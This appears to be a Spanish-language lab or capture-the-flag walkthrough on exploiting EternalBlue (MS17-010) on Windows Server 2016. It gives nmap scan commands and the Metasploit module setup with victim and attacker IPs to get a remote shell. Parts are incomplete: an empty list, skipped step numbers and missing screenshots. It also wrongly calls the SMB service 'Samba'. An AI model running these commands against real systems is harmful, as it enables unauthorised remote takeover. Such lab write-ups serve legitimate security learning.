💥 Explotación EternalBlue (MS17-010) en Windows Server 2016 💻🔓

🔥 ¿Qué es EternalBlue? 🔥

EternalBlue es una vulnerabilidad crítica en el protocolo SMB (Server Message Block) de Windows, revelada en 2017. Fue filtrada por el grupo Shadow Brokers, y originalmente desarrollada por la NSA para operaciones de espionaje. Esta falla permite la ejecución remota de código sin necesidad de autenticación, abriendo una puerta trasera para el control total del sistema. 🚪🔓

Fue responsable de ataques globales como:


🔍 Paso 1: Escaneo con Nmap

nmap -v -A 10.129.7.128

Pasted image 20250811191604.png
📡 Detecta sistema: Windows Server 2016

🔧 Servicio vulnerable: Samba

⚠️ Vulnerabilidad probable: EternalBlue (MS17-010)

🚀 Paso 2: Abrir Metasploit

msfconsole

🔎 Paso 3: Buscar exploit EternalBlue

search MS17-010

📌 Seleccionar exploit:

use exploit/windows/smb/ms17_010_eternalblue

Utilizamos show options para ver cuales son los obligatorios
{B5A272BD-0690-46A0-B44E-E7E932673D33}.png
🎯 Configurar IPs:

set RHOSTS <IP_víctima>
set LHOST <IP_atacante>
run 
shell

🎉 Paso 6: Obtener shell interactiva
✅ ¡Acceso conseguido! 🎊
{49329B8D-0580-45D6-8E2D-5DC4D639DD42}.png

🛠️ Comandos útiles en Metasploit

show options   # Muestra parámetros configurables
info           # Información detallada del exploit
targets        # Lista objetivos soportados por el exploit